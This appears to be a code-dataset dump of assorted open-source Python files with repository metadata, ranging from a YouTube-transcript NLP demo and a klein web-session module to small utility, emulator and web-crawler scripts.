hexsha
stringlengths 40
40
| size
int64 4
1.02M
| ext
stringclasses 8
values | lang
stringclasses 1
value | max_stars_repo_path
stringlengths 4
209
| max_stars_repo_name
stringlengths 5
121
| max_stars_repo_head_hexsha
stringlengths 40
40
| max_stars_repo_licenses
listlengths 1
10
| max_stars_count
int64 1
191k
⌀ | max_stars_repo_stars_event_min_datetime
stringlengths 24
24
⌀ | max_stars_repo_stars_event_max_datetime
stringlengths 24
24
⌀ | max_issues_repo_path
stringlengths 4
209
| max_issues_repo_name
stringlengths 5
121
| max_issues_repo_head_hexsha
stringlengths 40
40
| max_issues_repo_licenses
listlengths 1
10
| max_issues_count
int64 1
67k
⌀ | max_issues_repo_issues_event_min_datetime
stringlengths 24
24
⌀ | max_issues_repo_issues_event_max_datetime
stringlengths 24
24
⌀ | max_forks_repo_path
stringlengths 4
209
| max_forks_repo_name
stringlengths 5
121
| max_forks_repo_head_hexsha
stringlengths 40
40
| max_forks_repo_licenses
listlengths 1
10
| max_forks_count
int64 1
105k
⌀ | max_forks_repo_forks_event_min_datetime
stringlengths 24
24
⌀ | max_forks_repo_forks_event_max_datetime
stringlengths 24
24
⌀ | content
stringlengths 4
1.02M
| avg_line_length
float64 1.07
66.1k
| max_line_length
int64 4
266k
| alphanum_fraction
float64 0.01
1
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
d49fc7ede1c72540847e941c37d5dac38d26affa
| 1,911
|
py
|
Python
|
FindU.py
|
SWCapstone2021/NLP
|
3354153542603f8eef6a96994c903a3741ed31ae
|
[
"Apache-2.0"
] | null | null | null |
FindU.py
|
SWCapstone2021/NLP
|
3354153542603f8eef6a96994c903a3741ed31ae
|
[
"Apache-2.0"
] | 21
|
2021-05-10T11:13:07.000Z
|
2021-06-14T06:48:53.000Z
|
FindU.py
|
SWCapstone2021/NLP
|
3354153542603f8eef6a96994c903a3741ed31ae
|
[
"Apache-2.0"
] | null | null | null |
import os
from pprint import pprint as pp
from youtube_transcript_api import YouTubeTranscriptApi
from QA import load_qa_model, QA_system
from STT import load_stt_model, stt
from Summarization import load_summ_model, summary_script
from wordembedding import *
# Pin this process to GPU 2; must be set before any CUDA-using library initializes.
os.environ["CUDA_VISIBLE_DEVICES"] = "2"
def download_script(id):
    """Download the Korean caption track for one YouTube video id.

    Returns the list of caption dicts with the 'duration' key removed
    from each entry (each dict keeps whatever other keys the API returns).
    """
    result = YouTubeTranscriptApi.get_transcripts([id], languages=['ko'])
    # result[0] maps video id -> caption list; result[1] lists failed ids.
    captions = result[0][id]
    for entry in captions:
        entry.pop('duration', None)
    return captions
if __name__ == "__main__":
    # Interactive demo driver: each numbered choice exercises one subsystem
    # against the captions of a fixed demo video.
    # NOTE(review): the prompt's "fucntion" typo is a runtime string, left as-is.
    i = input("fucntion num: 1(ctrl+F), 2(reliability), 3(STT), 4(association), 5(summarization), 6(QA)")
    json_file = download_script('PRlueK97918')  # caption dicts for the demo video
    if i == '1':
        # Plain keyword search over the captions (ctrl_f from wordembedding).
        SearchingValue = input("keyword:")
        result_script = ctrl_f(SearchingValue, json_file)
        pp(result_script)
    if i == '2':
        # Cosine-similarity "reliability" score between keyword and script.
        sc_model = load_sc_model()
        SearchingValue = input("keyword:")
        score = cosin_similar(SearchingValue, json_file, sc_model)
        print(score)
    if i == '3':
        # Speech-to-text over a pre-downloaded audio file.
        print("Load model...", end='')
        stt_model, stt_vocab = load_stt_model()
        print("done")
        audio_path = 'data/origin_audio/2YD2p24EKb4.wav'
        sentences = stt(stt_model, stt_vocab, audio_path)
        # pp(sentences[:5])
    if i == '4':
        # Word-embedding-based association search.
        wm_model = load_wm_model()
        SearchingValue = input("keyword:")
        result_script = association_f(SearchingValue, json_file, wm_model)
        # pp(result_script)
    if i == '5':
        # Summarize the whole caption script.
        summ_model = load_summ_model()
        summ_script = summary_script(json_file, summ_model)
        pp(summ_script)
    if i == '6':
        # Question answering over the caption text.
        print("Load model...", end='')
        qa_model, qa_tokenizer = load_qa_model()
        print("done")
        question = '이혼한 날'  # demo question (Korean)
        answers = QA_system(qa_model, qa_tokenizer, question, json_file)
        # pp(answers[:5])
| 27.3
| 106
| 0.639456
|
f389b7bb3b1e51c81cc14c754c3fd3ee0ee29668
| 735
|
py
|
Python
|
python_module/threading_study/threading_study03.py
|
panc-test/python-study
|
fb172ed4a4f7fb521de9a005cd55115ad63a5b6d
|
[
"MIT"
] | 1
|
2021-09-17T09:32:56.000Z
|
2021-09-17T09:32:56.000Z
|
python_module/threading_study/threading_study03.py
|
panc-test/python-study
|
fb172ed4a4f7fb521de9a005cd55115ad63a5b6d
|
[
"MIT"
] | 2
|
2021-05-11T05:47:13.000Z
|
2021-05-11T05:48:10.000Z
|
python_module/threading_study/threading_study03.py
|
panc-test/python-study
|
fb172ed4a4f7fb521de9a005cd55115ad63a5b6d
|
[
"MIT"
] | null | null | null |
"""
守护线程:
主线程不管守护线程的执行情况,只要是其他子线程结束且主线程执行完毕,主线程都会关闭。
常见方法:
1、setDaemon(True)方法可以把子线程设置为主线程的守护线程,此方法必须在start之前
2、join()方法,让主线程等待子线程执行,此方法在start之后
"""
import threading
import time
def run1(name, n):
    """Print `name` with the current time once per second, `n` times."""
    count = 0
    while count < n:
        print(name, time.ctime())
        time.sleep(1)
        count += 1
def run2(name, n):
    """Worker loop: emit a timestamped line every second for `n` iterations."""
    for _iteration in range(n):
        timestamp = time.ctime()
        print(name, timestamp)
        time.sleep(1)
if __name__ == '__main__':
    # Make t1 a daemon thread: the main thread will not wait for t1; once all
    # non-daemon threads (here t2) finish, the interpreter exits and t1 is
    # killed mid-loop.
    t1 = threading.Thread(target=run1, args=("线程1", 10))  # args must be a tuple
    t2 = threading.Thread(target=run2, args=("线程2", 5))
    # Thread.setDaemon() is deprecated (Python 3.10+); assign the `daemon`
    # attribute instead. It must be set before start().
    t1.daemon = True
    t1.start()
    t2.start()
    # t1.join()  # would make the main thread wait for t1 to finish
| 21.617647
| 79
| 0.655782
|
e006fb3bf5c048ef0e328e016aff03490b25a193
| 957
|
py
|
Python
|
riscemu/__init__.py
|
jodalyst/riscemu
|
cede73c3c93c1d00168aa020dd9d982a213e3572
|
[
"MIT"
] | 9
|
2021-07-08T11:22:55.000Z
|
2022-01-30T10:32:48.000Z
|
riscemu/__init__.py
|
jodalyst/riscemu
|
cede73c3c93c1d00168aa020dd9d982a213e3572
|
[
"MIT"
] | 8
|
2021-12-03T18:16:19.000Z
|
2022-03-31T20:49:09.000Z
|
riscemu/__init__.py
|
jodalyst/riscemu
|
cede73c3c93c1d00168aa020dd9d982a213e3572
|
[
"MIT"
] | 2
|
2022-01-16T05:50:04.000Z
|
2022-03-23T21:27:27.000Z
|
"""
RiscEmu (c) 2021 Anton Lydike
SPDX-License-Identifier: MIT
This package aims at providing an all-round usable RISC-V emulator and debugger
It contains everything needed to run assembly files, so you don't need any custom compilers or toolchains
"""
from .Exceptions import RiscemuBaseException, LaunchDebuggerException, InvalidSyscallException, LinkerException, \
ParseException, NumberFormatException, InvalidRegisterException, MemoryAccessException, OutOfMemoryException
from .Tokenizer import RiscVInput, RiscVTokenizer
from .Executable import Executable, LoadedExecutable, LoadedMemorySection
from .ExecutableParser import ExecutableParser
from .instructions import *
from .MMU import MMU
from .Registers import Registers
from .Syscall import SyscallInterface, Syscall
from .CPU import CPU
from .Config import RunConfig
__author__ = "Anton Lydike <Anton@Lydike.com>"
__copyright__ = "Copyright 2021 Anton Lydike"
__version__ = '1.0.0'
| 30.870968
| 114
| 0.819227
|
49fa2c9b5405e2e467e3066bf6b8366ce35e84cf
| 1,210
|
py
|
Python
|
modules/dense_correspondence_manipulation/utils/constants.py
|
WangYixuan12/pytorch-dense-correspondence
|
82f2a37aaadc7638a89a224bd772dac7dad36906
|
[
"BSD-3-Clause"
] | 520
|
2018-06-25T00:46:38.000Z
|
2022-03-27T11:01:07.000Z
|
modules/dense_correspondence_manipulation/utils/constants.py
|
mmichelis/dense-object-nets-python3
|
c77cac0271219cd11940004e910951cdf4765e51
|
[
"BSD-3-Clause"
] | 66
|
2018-07-23T15:16:04.000Z
|
2021-08-10T13:40:25.000Z
|
modules/dense_correspondence_manipulation/utils/constants.py
|
mmichelis/dense-object-nets-python3
|
c77cac0271219cd11940004e910951cdf4765e51
|
[
"BSD-3-Clause"
] | 121
|
2018-06-26T13:52:03.000Z
|
2022-03-27T11:00:45.000Z
|
import os
import dense_correspondence_manipulation.utils.utils as utils
# Station-specific change-detection configs (RLG_iiwa_1), resolved relative to
# the dense-correspondence source tree.
CHANGE_DETECTION_CONFIG_FILE = os.path.join(utils.getDenseCorrespondenceSourceDir(), 'config', 'stations', 'RLG_iiwa_1', 'change_detection.yaml')
CHANGE_DETECTION_BACKGROUND_SUBTRACTION_CONFIG_FILE = os.path.join(utils.getDenseCorrespondenceSourceDir(), 'config', 'stations', 'RLG_iiwa_1', 'change_detection_background_subtraction.yaml')
BACKGROUND_SCENE_DATA_FOLDER = os.path.join(utils.getDenseCorrespondenceSourceDir(), 'data_volume', 'pdc','logs_proto', '14_background')
DEPTH_IM_SCALE = 1000.0  # This represents that depth images are saved as uint16, where the integer value
# is depth in millimeters. So this scale just converts millimeters to meters.
DEPTH_IM_RESCALE = 4000.0  # Only for visualization purposes
# Standard ImageNet normalization statistics (RGB order).
IMAGE_NET_MEAN = [0.485, 0.456, 0.406]
IMAGE_NET_STD_DEV = [0.229, 0.224, 0.225]
# Dataset-specific normalization statistics — presumably computed over the pdc
# training images; verify against the training pipeline before reuse.
DEFAULT_IMAGE_MEAN = [0.5573105812072754, 0.37420374155044556, 0.37020164728164673]
DEFAULT_IMAGE_STD_DEV = [0.24336038529872894, 0.2987397611141205, 0.31875079870224]
# RGB triples cycled through when drawing per-object labels.
LABEL_COLORS = [(255,0,0), (0,255,0), (0,0,255), (255,0,255), (0,125,125), (125,125,0), (200,255,50), (255, 125, 220), (10, 125, 255)]
| 57.619048
| 191
| 0.761983
|
994ad2c8c2984a3794a0100af848df796ce54a6d
| 12,621
|
py
|
Python
|
src/klein/_session.py
|
dimabe/klein
|
272508296d1d0fe9206ce1e33ed572d775f164ac
|
[
"MIT"
] | null | null | null |
src/klein/_session.py
|
dimabe/klein
|
272508296d1d0fe9206ce1e33ed572d775f164ac
|
[
"MIT"
] | null | null | null |
src/klein/_session.py
|
dimabe/klein
|
272508296d1d0fe9206ce1e33ed572d775f164ac
|
[
"MIT"
] | null | null | null |
# -*- test-case-name: klein.test.test_session -*-
from typing import (
Any, Callable, Optional as _Optional, TYPE_CHECKING, Union
)
import attr
from twisted.internet.defer import inlineCallbacks, returnValue
from twisted.python.reflect import qual
from twisted.web.http import UNAUTHORIZED
from twisted.web.resource import Resource
from zope.interface import implementer
from zope.interface.interfaces import IInterface
from .interfaces import (
EarlyExit, IDependencyInjector, IRequestLifecycle, IRequiredParameter,
ISession, ISessionProcurer, ISessionStore, NoSuchSession, SessionMechanism,
TooLateForCookies
)
if TYPE_CHECKING: # pragma: no cover
from mypy_extensions import Arg, KwArg
from twisted.web.iweb import IRequest
from twisted.python.components import Componentized
from typing import Dict, Sequence, Text, TypeVar
T = TypeVar('T')
else:
Arg = KwArg = lambda t, *x: t
@implementer(ISessionProcurer)  # type: ignore[misc]
@attr.s
class SessionProcurer(object):
    """
    A L{SessionProcurer} procures a session from a request and a store.

    @ivar _store: The session store to procure a session from.
    @type _store: L{klein.interfaces.ISessionStore}

    @ivar _maxAge: The maximum age (in seconds) of the session cookie.
    @type _maxAge: L{int}

    @ivar _secureCookie: The name of the cookie to use for sessions protected
        with TLS (i.e. HTTPS).
    @type _secureCookie: L{bytes}

    @ivar _insecureCookie: The name of the cookie to use for sessions I{not}
        protected with TLS (i.e. HTTP).
    @type _insecureCookie: L{bytes}

    @ivar _cookieDomain: If set, the domain name to restrict the session cookie
        to.
    @type _cookieDomain: L{None} or L{bytes}

    @ivar _cookiePath: If set, the URL path to restrict the session cookie to.
    @type _cookiePath: L{bytes}

    @ivar _secureTokenHeader: The name of the HTTPS header to try to extract a
        session token from; API clients should use this header, rather than a
        cookie.
    @type _secureTokenHeader: L{bytes}

    @ivar _insecureTokenHeader: The name of the HTTP header to try to extract a
        session token from; API clients should use this header, rather than a
        cookie.
    @type _insecureTokenHeader: L{bytes}

    @ivar _setCookieOnGET: Automatically request that the session store create
        a session if one is not already associated with the request and the
        request is a GET.
    @type _setCookieOnGET: L{bool}
    """

    _store = attr.ib(type=ISessionStore)  # type: ignore[misc]
    _maxAge = attr.ib(type=int, default=3600)
    _secureCookie = attr.ib(type=bytes, default=b"Klein-Secure-Session")
    _insecureCookie = attr.ib(type=bytes, default=b"Klein-INSECURE-Session")
    _cookieDomain = attr.ib(type=_Optional[bytes], default=None)
    _cookiePath = attr.ib(type=bytes, default=b"/")
    _secureTokenHeader = attr.ib(type=bytes, default=b"X-Auth-Token")
    _insecureTokenHeader = attr.ib(type=bytes,
                                   default=b"X-INSECURE-Auth-Token")
    _setCookieOnGET = attr.ib(type=bool, default=True)

    @inlineCallbacks
    def procureSession(self, request, forceInsecure=False):
        # type: (IRequest, bool) -> Any
        """
        Retrieve the session associated with C{request}, creating one (and
        setting a cookie) if necessary and permitted.

        Token sources are a header or a cookie, chosen by transport security;
        a session already cached on the request is reused when possible.
        """
        # Reuse a session already attached to this request, unless the caller
        # wants an insecure session and the request is actually secure.
        alreadyProcured = request.getComponent(ISession)  # type: ignore[misc]
        if alreadyProcured is not None:
            if not forceInsecure or not request.isSecure():
                returnValue(alreadyProcured)
        if request.isSecure():
            if forceInsecure:
                tokenHeader = self._insecureTokenHeader
                cookieName = self._insecureCookie  # type: Union[Text, bytes]
                sentSecurely = False
            else:
                tokenHeader = self._secureTokenHeader
                cookieName = self._secureCookie
                sentSecurely = True
        else:
            # Have we inadvertently disclosed a secure token over an insecure
            # transport, for example, due to a buggy client?
            allPossibleSentTokens = (
                sum([request.requestHeaders.getRawHeaders(header, [])
                     for header in [self._secureTokenHeader,
                                    self._insecureTokenHeader]], []) +
                [it for it in [request.getCookie(cookie)
                               for cookie in [self._secureCookie,
                                              self._insecureCookie]] if it]
            )  # type: Sequence[Text]
            # Does it seem like this check is expensive? It sure is! Don't want
            # to do it? Turn on your dang HTTPS!
            yield self._store.sentInsecurely(allPossibleSentTokens)
            tokenHeader = self._insecureTokenHeader
            cookieName = self._insecureCookie
            sentSecurely = False
            # Fun future feature: honeypot that does this over HTTPS, but sets
            # isSecure() to return false because it serves up a cert for the
            # wrong hostname or an invalid cert, to keep API clients honest
            # about chain validation.
        sentHeader = (request.getHeader(tokenHeader) or b"").decode("utf-8")
        sentCookie = (request.getCookie(cookieName) or b"").decode("utf-8")
        # A header token takes precedence over a cookie token.
        if sentHeader:
            mechanism = SessionMechanism.Header
        else:
            mechanism = SessionMechanism.Cookie
        if not (sentHeader or sentCookie):
            session = None
        else:
            try:
                session = yield self._store.loadSession(
                    sentHeader or sentCookie, sentSecurely, mechanism
                )
            except NoSuchSession:
                # Header clients must handle the error themselves; cookie
                # clients fall through to (possibly) getting a new session.
                if mechanism == SessionMechanism.Header:
                    raise
                session = None
        if (
            mechanism == SessionMechanism.Cookie and
            (session is None or session.identifier != sentCookie)
        ):
            if session is None:
                if request.startedWriting:
                    # At this point, if the mechanism is Header, we either have
                    # a valid session or we bailed after NoSuchSession above.
                    raise TooLateForCookies(
                        "You tried initializing a cookie-based session too"
                        " late in the request pipeline; the headers"
                        " were already sent."
                    )
                if request.method != b'GET':
                    # Sessions should only ever be auto-created by GET
                    # requests; there's no way that any meaningful data
                    # manipulation could succeed (no CSRF token check could
                    # ever succeed, for example).
                    raise NoSuchSession(
                        u"Can't initialize a session on a {method} request."
                        .format(method=request.method.decode("ascii"))
                    )
                if not self._setCookieOnGET:
                    # We don't have a session ID at all, and we're not allowed
                    # by policy to set a cookie on the client.
                    raise NoSuchSession(
                        u"Cannot auto-initialize a session for this request."
                    )
                session = yield self._store.newSession(sentSecurely, mechanism)
            # Normalize identifier/cookie-name to native str before setting
            # the cookie (they may arrive as bytes or text).
            identifierInCookie = session.identifier
            if not isinstance(identifierInCookie, str):
                identifierInCookie = identifierInCookie.encode("ascii")
            if not isinstance(cookieName, str):
                cookieName = cookieName.decode("ascii")
            request.addCookie(
                cookieName, identifierInCookie, max_age=str(self._maxAge),
                domain=self._cookieDomain, path=self._cookiePath,
                secure=sentSecurely, httpOnly=True,
            )
        if sentSecurely or not request.isSecure():
            # Do not cache the insecure session on the secure request, thanks.
            request.setComponent(ISession, session)  # type: ignore[misc]
        returnValue(session)
# Either a 1-argument (instance-bound) or 0-argument callable that produces a
# session procurer.
_procureProcurerType = Union[
    Callable[[Any], ISessionProcurer],
    Callable[[], ISessionProcurer]
]

# Loose aliases for klein's route/renderable plumbing.
_kleinRenderable = Any
_routeCallable = Any
_kleinCallable = Callable[..., _kleinRenderable]
_kleinDecorator = Callable[[_kleinCallable], _kleinCallable]
# Shape of Requirer.require-style results: takes a route plus keyword
# arguments and returns a decorator for a klein callable.
_requirerResult = Callable[[Arg(_routeCallable, 'route'), KwArg(Any)],
                           Callable[[_kleinCallable], _kleinCallable]]
class AuthorizationDenied(Resource, object):
    """Resource rendered when a required authorization is not granted.

    Responds with HTTP 401 and a plain-text body naming the denied interface.
    """

    def __init__(self, interface, instance):
        # type: (IInterface, Any) -> None
        # NOTE(review): `instance` is accepted but not stored — looks
        # intentional, as only the interface is needed for the message.
        self._interface = interface
        super(AuthorizationDenied, self).__init__()

    def render(self, request):
        # type: (IRequest) -> bytes
        request.setResponseCode(UNAUTHORIZED)
        denied = "{} DENIED".format(qual(self._interface))
        return denied.encode('utf-8')
@implementer(IDependencyInjector, IRequiredParameter)  # type: ignore[misc]
@attr.s
class Authorization(object):
    """
    Declare that a C{require}-decorated function requires a certain interface
    be authorized from the session.

    This is a dependency injector used in conjunction with a L{klein.Requirer},
    like so::

        from klein import Requirer, SessionProcurer
        from klein.interfaces import ISession

        from myapp import ISuperDuperAdmin

        requirer = Requirer()
        procurer = SessionProcurer(store=someSessionStore)
        @requirer.prerequisite(ISession)
        def sessionize(request):
            return procurer.procureSession(request)

        app = Klein()

        @requirer.require(
            app.route("/admin"),
            adminPowers=Authorization(ISuperDuperAdmin)
        )
        def myRoute(adminPowers):
            return 'ok admin: ' + adminPowers.doAdminThing()

    In this example, ISuperDuperAdmin is an interface known to your
    application, and (via authorization plugins depending on your session
    storage backend) to your session store. It has a doAdminThing method.
    When a user hits /admin in their browser, if they are duly authorized,
    they'll see 'ok admin: ' and whatever the super-secret result of
    doAdminThing is. If not, by default, they'll simply get an HTTP
    UNAUTHORIZED response that says "myapp.ISuperDuperAdmin DENIED". (This
    behavior can be customized via the C{whenDenied} parameter to
    L{Authorization}.)

    @ivar _interface: the interface that is required. a provider of this
        interface is what will be dependency-injected.

    @ivar _required: is this authorization required? If so (the default),
        don't invoke the application code if it cannot be authorized by the
        procured session, and instead return the object specified by whenDenied
        from the dependency-injection process. If not, then just pass None if
        it is not on the session.

    @ivar _whenDenied: when this authorization is denied, what object - usually
        an IResource - should be returned to the route decorator that was
        passed to L{Requirer.require}? Note that this will never be used if
        C{required} is set to C{False}.
    """

    _interface = attr.ib(type=IInterface)
    _required = attr.ib(type=bool, default=True)
    _whenDenied = attr.ib(type=Callable[[IInterface, Any], Any],
                          default=AuthorizationDenied)

    def registerInjector(self, injectionComponents, parameterName, lifecycle):
        # type: (Componentized, str, IRequestLifecycle) -> IDependencyInjector
        """
        Register this authorization to inject a parameter.
        """
        # This object is both the IRequiredParameter and its own
        # IDependencyInjector, so registration just returns self.
        return self

    @inlineCallbacks
    def injectValue(self, instance, request, routeParams):
        # type: (Any, IRequest, Dict[str, Any]) -> Any
        """
        Inject a value by asking the request's session.
        """
        # TODO: this could be optimized to do fewer calls to 'authorize' by
        # collecting all the interfaces that are necessary and then using
        # addBeforeHook; the interface would not need to change.
        session = ISession(request)  # type: ignore[misc]
        provider = (
            (yield session.authorize([self._interface])).get(self._interface)
        )
        if self._required and provider is None:
            # Short-circuit the route: the denial object (usually an
            # IResource) is returned instead of invoking application code.
            raise EarlyExit(self._whenDenied(self._interface, instance))
        # TODO: CSRF protection should probably go here
        returnValue(provider)

    def finalize(self):
        # type: () -> None
        """
        Nothing to finalize when registering.
        """
| 41.245098
| 79
| 0.635924
|
f227573c8fb6cfa306fefbc5b8dc23a9b3b28225
| 123
|
py
|
Python
|
states.py
|
GrishaVoronin/Rulimpbot
|
61dd2ef2d4d654ff1ae9e602dc92ffaefef3077d
|
[
"Apache-2.0"
] | null | null | null |
states.py
|
GrishaVoronin/Rulimpbot
|
61dd2ef2d4d654ff1ae9e602dc92ffaefef3077d
|
[
"Apache-2.0"
] | null | null | null |
states.py
|
GrishaVoronin/Rulimpbot
|
61dd2ef2d4d654ff1ae9e602dc92ffaefef3077d
|
[
"Apache-2.0"
] | null | null | null |
from aiogram.dispatcher.filters.state import StatesGroup, State
class UserParams(StatesGroup):
    """Finite-state-machine states for the per-user dialogue."""
    # State active while the bot waits for the user to pick an olympiad.
    SetOlympiad = State()
| 20.5
| 63
| 0.788618
|
b843be025634b756b6baeb5718528af4e4ca8344
| 375
|
py
|
Python
|
main.py
|
JustAnOkapi/Unit-Circle
|
6147f9119f70fd8c109aa79dd45bc62031edf610
|
[
"Unlicense"
] | null | null | null |
main.py
|
JustAnOkapi/Unit-Circle
|
6147f9119f70fd8c109aa79dd45bc62031edf610
|
[
"Unlicense"
] | null | null | null |
main.py
|
JustAnOkapi/Unit-Circle
|
6147f9119f70fd8c109aa79dd45bc62031edf610
|
[
"Unlicense"
] | null | null | null |
from sympy import *
from prettytable import PrettyTable, ALL
# Build and print a reference table of unit-circle angles with their radian
# form and exact sin/cos values (pretty-printed by sympy).
circle = PrettyTable(["Degree", "Radian", "sin()", "cos()"])
circle.hrules = ALL  # horizontal rule between every row
# Standard unit-circle angles. Fix: 270 was missing from the original list.
for deg in [0, 30, 45, 60, 90, 120, 135, 150, 180, 210, 225, 240, 270, 300, 315, 330]:
    rad = Rational(deg, 180) * pi  # exact rational multiple of pi
    circle.add_row([deg, pretty(rad), pretty(sin(rad)), pretty(cos(rad))])
pprint(circle)
# idk how this took 2 hours to do
| 34.090909
| 75
| 0.669333
|
f29362acf8c625402b273c9a2bb9ed5536e93bb9
| 510
|
py
|
Python
|
Array/Medium/56. Merge Intervals/solution.py
|
tintindas/leetcode-solutions
|
eb97254dafddffccbce048ef04aea1e934277282
|
[
"MIT"
] | 1
|
2021-03-10T02:48:39.000Z
|
2021-03-10T02:48:39.000Z
|
Array/Medium/56. Merge Intervals/solution.py
|
tintindas/leetcode-solutions
|
eb97254dafddffccbce048ef04aea1e934277282
|
[
"MIT"
] | null | null | null |
Array/Medium/56. Merge Intervals/solution.py
|
tintindas/leetcode-solutions
|
eb97254dafddffccbce048ef04aea1e934277282
|
[
"MIT"
] | 1
|
2021-03-18T08:22:29.000Z
|
2021-03-18T08:22:29.000Z
|
from typing import List
class Solution:
    def merge(self, intervals: List[List[int]]) -> List[List[int]]:
        """Merge overlapping intervals.

        Sorts the intervals by start point, then sweeps once, coalescing
        every interval that overlaps the current [start, end] window.

        :param intervals: list of [start, end] pairs (may be empty).
        :return: disjoint merged intervals in ascending order.
        """
        # Fix: the original indexed intervals[0] and raised IndexError on [].
        if not intervals:
            return []
        res = []
        intervals.sort()
        start, end = intervals[0]
        for s, e in intervals[1:]:
            if end < s:
                # Disjoint: close out the current window and start a new one.
                res.append([start, end])
                start, end = s, e
            else:
                # Overlapping (or touching): extend the window.
                end = max(e, end)
        res.append([start, end])
        return res
| 23.181818
| 67
| 0.452941
|
bd02ef3c5a1fc287510851ff6af5853af4628f8a
| 1,280
|
py
|
Python
|
src/python/pants/backend/jvm/subsystems/jar_tool.py
|
revl/pants
|
8ad83e4ca80c095d44efceafd8b41e575da39c65
|
[
"Apache-2.0"
] | 1
|
2021-05-05T18:58:28.000Z
|
2021-05-05T18:58:28.000Z
|
src/python/pants/backend/jvm/subsystems/jar_tool.py
|
revl/pants
|
8ad83e4ca80c095d44efceafd8b41e575da39c65
|
[
"Apache-2.0"
] | null | null | null |
src/python/pants/backend/jvm/subsystems/jar_tool.py
|
revl/pants
|
8ad83e4ca80c095d44efceafd8b41e575da39c65
|
[
"Apache-2.0"
] | 3
|
2020-06-30T08:28:13.000Z
|
2021-07-28T09:35:57.000Z
|
# Copyright 2015 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from pants.backend.jvm.subsystems.jvm_tool_mixin import JvmToolMixin
from pants.base.workunit import WorkUnitLabel
from pants.java.jar.jar_dependency import JarDependency
from pants.subsystem.subsystem import Subsystem
class JarTool(JvmToolMixin, Subsystem):
    """Subsystem wrapping the pantsbuild `jar-tool` JVM binary.

    Registers the tool's bootstrap classpath and exposes `run` to invoke it
    inside a tool workunit.
    """
    options_scope = "jar-tool"

    @classmethod
    def register_options(cls, register):
        """Register the pinned jar-tool artifact as a JVM tool."""
        super().register_options(register)
        cls.register_jvm_tool(
            register,
            "jar-tool",
            classpath=[JarDependency(org="org.pantsbuild", name="jar-tool", rev="0.0.16"),],
        )

    def run(self, context, runjava, args):
        """Invoke org.pantsbuild.tools.jar.Main with `args` via `runjava`.

        Returns whatever `runjava` returns — presumably an exit code; verify
        against callers.
        """
        return runjava(
            self.tool_classpath_from_products(
                context.products, "jar-tool", scope=self.options_scope
            ),
            "org.pantsbuild.tools.jar.Main",
            jvm_options=self.get_options().jvm_options,
            args=args,
            workunit_name="jar-tool",
            workunit_labels=[
                WorkUnitLabel.TOOL,
                WorkUnitLabel.JVM,
                WorkUnitLabel.NAILGUN,
                WorkUnitLabel.SUPPRESS_LABEL,
            ],
        )
| 33.684211
| 92
| 0.632813
|
a28862cd74cd574b75c1b2f7316afcd4dc0db015
| 278
|
py
|
Python
|
lego/apps/permissions/validators.py
|
andrinelo/lego
|
9b53c8fe538d9107b980a70e2a21fb487cc3b290
|
[
"MIT"
] | null | null | null |
lego/apps/permissions/validators.py
|
andrinelo/lego
|
9b53c8fe538d9107b980a70e2a21fb487cc3b290
|
[
"MIT"
] | null | null | null |
lego/apps/permissions/validators.py
|
andrinelo/lego
|
9b53c8fe538d9107b980a70e2a21fb487cc3b290
|
[
"MIT"
] | null | null | null |
from django.core.validators import RegexValidator
class KeywordPermissionValidator(RegexValidator):
    """Validate keyword permission strings of the form ``/a/b/.../``.

    Accepts one or more letters-only segments, each terminated by a slash,
    with a leading slash — e.g. ``/sudo/`` or ``/events/create/``.
    """
    regex = r'^/([a-zA-Z]+/)+$'
    message = 'Keyword permissions can only contain forward slashes and letters ' \
              'and must begin and end with a forward slash'
| 34.75
| 83
| 0.708633
|
51dcd1f55be9bc078de30dc520a30a33b11a8f78
| 1,088
|
py
|
Python
|
tests/air-spider/test_air_spider.py
|
RuixiangS/feapder
|
e21098c9d4f4ba001275f4d4d57d6ea4687b93a8
|
[
"MIT"
] | 876
|
2021-02-09T11:08:04.000Z
|
2022-03-31T21:14:11.000Z
|
tests/air-spider/test_air_spider.py
|
lovebull/feapder
|
1cee596380b6ce5e1615ef81d3e57a1b290129d9
|
[
"MIT"
] | 94
|
2021-02-20T07:59:28.000Z
|
2022-03-28T09:54:53.000Z
|
tests/air-spider/test_air_spider.py
|
lovebull/feapder
|
1cee596380b6ce5e1615ef81d3e57a1b290129d9
|
[
"MIT"
] | 172
|
2021-02-22T08:24:44.000Z
|
2022-03-29T08:15:27.000Z
|
# -*- coding: utf-8 -*-
"""
Created on 2020/4/22 10:41 PM
---------
@summary:
---------
@author: Boris
@email: boris_liu@foxmail.com
"""
import feapder
class TestAirSpider(feapder.AirSpider):
    """Minimal feapder AirSpider exercising the main lifecycle hooks."""
    # __custom_setting__ = dict(
    #     LOG_LEVEL = "INFO"
    # )

    def start_callback(self):
        """Hook run once when the spider starts."""
        print("爬虫开始")

    def end_callback(self):
        """Hook run once when the spider finishes."""
        print("爬虫结束")

    def start_requests(self, *args, **kws):
        """Seed the crawl with a single request."""
        yield feapder.Request("https://www.baidu.com")

    def download_midware(self, request):
        """Pre-download hook; may mutate headers/proxies/cookies on the request."""
        # request.headers = {'User-Agent': ""}
        # request.proxies = {"https":"https://12.12.12.12:6666"}
        # request.cookies = {}
        return request

    def validate(self, request, response):
        """Decide whether the downloaded response is acceptable."""
        if response.status_code != 200:
            raise Exception("response code not 200")  # raising triggers a retry
        # if "哈哈" not in response.text:
        #     return False  # returning False discards this request

    def parse(self, request, response):
        """Print the page title extracted via both bs4 and xpath."""
        print(response.bs4().title)
        print(response.xpath("//title").extract_first())
if __name__ == "__main__":
    # Run the demo spider when executed directly.
    TestAirSpider().start()
| 22.204082
| 64
| 0.587316
|
fa1ed55c465c714cab7cbd8aebcd67ec78ad7fa2
| 6,170
|
py
|
Python
|
tests/fixtures/postgres_fixtures.py
|
autosuggested/fidesops
|
a399abbc39e8fc528bc31d1bd3f0419c3379e6f3
|
[
"Apache-2.0"
] | 41
|
2021-11-01T23:53:43.000Z
|
2022-03-22T23:07:56.000Z
|
tests/fixtures/postgres_fixtures.py
|
autosuggested/fidesops
|
a399abbc39e8fc528bc31d1bd3f0419c3379e6f3
|
[
"Apache-2.0"
] | 235
|
2021-11-01T20:31:55.000Z
|
2022-03-31T15:40:58.000Z
|
tests/fixtures/postgres_fixtures.py
|
autosuggested/fidesops
|
a399abbc39e8fc528bc31d1bd3f0419c3379e6f3
|
[
"Apache-2.0"
] | 12
|
2021-11-02T00:44:51.000Z
|
2022-03-14T16:23:10.000Z
|
import logging
import pytest
from typing import Dict, Generator, List
from uuid import uuid4
from sqlalchemy.orm import (
